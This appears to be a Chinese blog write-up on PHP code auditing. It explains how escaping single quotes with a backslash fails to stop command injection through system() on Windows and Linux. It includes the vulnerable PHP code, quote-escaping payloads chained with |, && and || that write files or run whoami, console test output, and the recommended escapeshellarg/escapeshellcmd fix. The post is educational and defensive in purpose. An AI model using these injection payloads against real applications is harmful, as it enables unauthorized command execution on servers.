php代码审计之命令执行中windows/linux的差异化问题
昨天好基友发来了一段代码,还是挺有趣的,记录下:
<?php
$a = '\''.str_replace("'","\'",$_GET[1]).'\'';
$b = '\''.str_replace("'","\'",$_GET[2]).'\'';
echo($a);
echo "<br/>";
var_dump($b);
echo "<br/>";
var_dump('echo '. $a . $b);
echo "<br/>";
system('echo '. $a . $b);
echo "<br/>";
?>
代码如下,要求windows和linux下执行命令
先从windows下手吧:
payload:
test' | echo 123 > helloworld.txt |dir &2=1
页面输出:
'test\' | echo 123 > helloworld.txt |dir '
string(3) "'1'"
string(50) "echo 'test\' | echo 123 > helloworld.txt |dir ''1'"
驱动器 C 中的卷没有标签。 卷的序列号是 4A10-0977 C:\phpStudy\WWW 的目录
发现即使转义了单引号仍待可以命令执行,问题出在哪里呢?
打开windows cmd:
直接输入这段语句:
echo 'test\' | echo 123 > helloworld.txt |dir ''1'

此时我的桌面上就有了一个helloworld.txt文件
其实问题就出在程序员误把\认为是windows的转义符,其实windows真正的转义符就是(^):
我们可以多测试几次看看:
测试用例如下:
先测试有效的:
C:\Users\maniac123\Desktop>echo 'test\' | echo 123
123 C:\Users\maniac123\Desktop>echo 'test | echo 123
123 C:\Users\maniac123\Desktop>echo 'x''' | echo 123
123 C:\Users\maniac123\Desktop>echo 'x | echo 123'
123' C:\Users\maniac123\Desktop>

发现在windows下,如果使用\'的方式去处理修复rce,是不对的,通过连接符,将会畅通无阻.如果不去处理正确的转义连接符,会导致rce:
比如说我这样输入:
C:\Users\maniac123\Desktop>echo 'x 111.txt\| echo 123'
123' C:\Users\maniac123\Desktop>

仍然是正常输出,除非使用^去处理连接符:
C:\Users\maniac123\Desktop>echo 'x 111.txt^| echo 123'
'x 111.txt| echo 123' C:\Users\maniac123\Desktop>

如果使用^去转义,只会打印,而不是执行
那么上面那段代码在windows下无效,建议使用:php自带的命令执行处理函数escapeshellarg或escapeshellcmd
无效测试用例:
C:\Users\maniac123\Desktop>echo "xxx | echo 123"
"xxx | echo 123" C:\Users\maniac123\Desktop>echo "xxx && echo 123"
"xxx && echo 123" C:\Users\maniac123\Desktop>
在windows下如果可控的数据被双引号包裹,那又不一样了,windows认为他只是字符串,他只会原样输出:

这样,都不需要转义连接符号,就把漏洞扼杀在摇篮里了,真的无懈可击吗?
稍微修改下输入:
C:\Users\maniac123\Desktop>echo "xxx^" | whoami
maniac123-pc\maniac123 C:\Users\maniac123\Desktop>echo "xxx\" | whoami
maniac123-pc\maniac123 C:\Users\maniac123\Desktop>echo "xxx/" | whoami
maniac123-pc\maniac123
如果有程序员二次画蛇添足做多余转义处理,那么就会逃逸导致再次命令执行:

在windows下只要看到"了,就代表是闭合了,前面什么符号都没关系!
通过这个差异,下次源码审计就可以钻这种空子,实现命令执行.
windows大致说完了,现在来讲讲linux下的问题:
linux的转义符号有两个:分别是(\)和(''),大多数都知道前者,后者容易被忽略

都可以起到转义的作用
当使用(\)或者('')转义连接符的时候,命令执行会失败:

上测试代码:
<?php
$t1 = "这是可控点1";
$t2 = "这是可控点2";
$a = "\'".str_replace("'","\'",$t1)."\'";
$b = "\'".str_replace("'","\'",$t2)."\'";
echo $a;
echo($a);
echo "<br/>";
var_dump($b);
echo "<br/>";
var_dump('echo '. $a . $b);
echo "<br/>";
system('echo '. $a . $b);
echo "<br/>";
?>
直接给出payload:
<?php
$t1 = "' && echo 11111111 > hello.txt && '";
$t2 = "\'";
$a = "\'".str_replace("'","\'",$t1)."\'";
$b = "\'".str_replace("'","\'",$t2)."\'";
echo $a;
echo($a);
echo "<br/>";
var_dump($b);
echo "<br/>";
var_dump('echo '. $a . $b);
echo "<br/>";
system('echo '. $a . $b);
echo "<br/>";
?>
打印输出看下:
\'\' && echo 11111111 > hello.txt && \'\'\'\' && echo 11111111 > hello.txt && \'\'<br/>string(7) "\'\\'\'"
<br/>string(53) "echo \'\' && echo 11111111 > hello.txt && \'\'\'\\'\'"
<br/>''
sh: '''\\: command not found
把这部分取出来即可:
"echo \'\' && echo 11111111 > hello.txt && \'\'\'\\'\'"
单独拎出来:
echo \'\' && echo 11111111 > hello.txt && \'\'\'\\'\'
linux cmd下运行下:

为什么可以?
前面的代码发现,这里把'转换成\',比较有迷惑性的输入:
\'\'\'\\'\'
再次运行:

输出
'''\\
前面说了linux 下 '*'才是转义符,\也是转义符:
分开执行:

这样就清晰多了
linux和windows下区别很大:
如果linux这样做,直接gg了,引号包裹里面,就扼杀了命令执行的可能性:

还是\'使用不当,导致想输入的恶意语句逃逸:
[root@VM-0-6-centos ~]# cat 123.txt
cat: 123.txt: 没有那个文件或目录
[root@VM-0-6-centos ~]# echo '\'|echo 123 > 123.txt|\\''
-bash: \: 未找到命令
[root@VM-0-6-centos ~]# cat 123.txt
123
[root@VM-0-6-centos ~]#

为什么可以执行命令?因为转义符!导致我们的{echo 123 > 123.txt}是一个整体,直接命令执行
其实不借助第二个可控参数,仍然可以命令执行只要这样:
<?php
$t1 = "' && echo 11111111 > hello.txt && '";
$t2 = "";
$a = "\'".str_replace("'","\'",$t1)."\'";
$b = "\'".str_replace("'","\'",$t2)."\'";
echo $a;
echo($a);
echo "<br/>";
var_dump($b);
echo "<br/>";
var_dump('echo '. $a . $b);
echo "<br/>";
system('echo '. $a . $b);
echo "<br/>";
?>
输出
\'\' || echo 11111111 > hello.txt || \'\'\'\' || echo 11111111 > hello.txt || \'\'<br/>string(4) "\'\'"
<br/>string(50) "echo \'\' || echo 11111111 > hello.txt || \'\'\'\'"
<br/>''
<br/>
其中最终的输出的是:
echo \'\' || echo 11111111 > hello.txt || \'\'\'\'
都一一转义了,此时此刻{echo 11111111 > hello.txt}就是一个整体
那么在linux下命令执行修复方案如下:建议使用:php自带的命令执行处理函数escapeshellarg或escapeshellcmd
还是比较有意思的,呵呵
php代码审计之命令执行中windows/linux的差异化问题的更多相关文章
- 用前端姿势玩docker【五】快速构建中类Unix系统与Windows系统的差异化处理
目录 用前端姿势玩docker[一]Docker通俗理解常用功能汇总与操作埋坑 用前端姿势玩docker[二]dockerfile定制镜像初体验 用前端姿势玩docker[三]基于nvm的前端环境构建 ...
- PHP代码审计笔记--命令执行漏洞
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别. 0x01漏洞实例 例1: <?php $target=$_REQUEST['ip']; ...
- 2020/1/28 PHP代码审计之命令执行漏洞
0x00 命令执行漏洞原理 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system.exec.shell_exec.passthru.popen.proc_popen等函数可以执行 ...
- ASP代码审计 -4.命令执行漏洞总结
命令执行漏洞: 保存为cmd.asp,提交链接: http://localhost/cmd.asp?ip=127.0.0.1 即可执行命令 <%ip=request("ip" ...
- 常用命令行指令 Windows & Linux
一.Linux linux常用命令详解:https://www.cnblogs.com/yuncong/p/10247583.html 挂载U盘到linux一个文件夹中 二.Windows 1.查看电 ...
- php bypass disable_function 命令执行 方法汇总简述
1.使用未被禁用的其他函数 exec,shell_exec,system,popen,proc_open,passthru (python_eval?perl_system ? weevely3 wi ...
- 【渗透测试学习平台】 web for pentester -6.命令执行
命令执行漏洞 windows支持: | ping 127.0.0.1|whoami || ping 2 || whoami (哪条名 ...
- 在 Linux/windows下 命令行中使用和执行 PHP 代码[交互式php]
[注释]在ubuntu下,升级php到7.1版本,虽然提示的是Interactive mode enabled, 但实际上可以直接书写命令,和interactive shell效果一样. 一:wind ...
- 在 Linux 命令行中使用和执行 PHP 代码
PHP是一个开源服务器端脚本语言,最初这三个字母代表的是“Personal Home Page”,而现在则代表的是“PHP:Hypertext Preprocessor”,它是个递归首字母缩写.它是一 ...
随机推荐
- Day05_18_类和对象的含义与关系
Java 类和对象 类的含义? 类属于引用数据类型,java语言中所有的.class都属于引用数据类型, 在类体当中,方法体之外定义的变量被称为 成员变量,成员变量若没有赋值,系统会默认赋值为0: 先 ...
- CSS 还能这样玩?奇思妙想渐变的艺术
在之前的这篇文章 -- 一行 CSS 代码的魅力 中,我们介绍了一种使用一行 CSS 代码就能够生成的一种美妙(也许奇怪更合适)的背景. 本文,将继续介绍背景的一些有意思的知识,利用一些极小的单位,只 ...
- JUC包的线程池详解
为什么要使用线程池 创建/销毁线程需要消耗系统资源,线程池可以复用已创建的线程. 控制并发的数量.并发数量过多,可能会导致资源消耗过多,从而造成服务器崩溃.(主要原因) 可以对线程做统一管理. JUC ...
- 构建基于表单配置的 Jenkins 测试项目(接口、UI、APP、Jmeter)
1. 第一个 hello world 项目 2. 构建自动触发的项目(接口测试) 1)新建测试项目(执行测试脚本) 2)新建 Maven 打包项目 3)手动执行构建 4)修改 Web 工程代码并 pu ...
- 【死磕ibatis】SqlMapClient 基本操作示例
前言:想要学习ibatis,我这里写了一些关于SqlMapClient 的具体例子,希望对你有帮助.话不多说,直接看例子. 例 1: 数据写入操作(insert, update, delete): s ...
- misdirection靶机work_through
web打点 nmap扫描 Nmap scan report for 192.168.218.135 Host is up (0.000014s latency). Not shown: 65531 c ...
- .NET 中的 Worker Service 入门介绍
翻译自 Steve Gordon 2020年3月30日的文章 <WHAT ARE .NET WORKER SERVICES?> [1] 随着 .NET Core 3.0 的发布,ASP.N ...
- JavaScript 通过身份证号获取出生日期、年龄、性别 、籍贯
JavaScript 通过身份证号获取出生日期.年龄.性别 .籍贯(很全) 效果图: 示例代码: //由于没有写外部JS,所以代码比较长!!! <!DOCTYPE html PUBLIC &qu ...
- C#-FTP
/// <summary> /// 上传文件 /// </summary> /// <param name="fileinfo">需要上传的文件 ...
- Day003 彻底搞懂++、--
彻底搞懂++.-- ++.--都是一目运算符 b=a++(把a的值先赋给b,a再自增1) b=++a(a先自增1,再赋给b) 通过一个例子理解 int a=1; int b=a++; int c=++ ...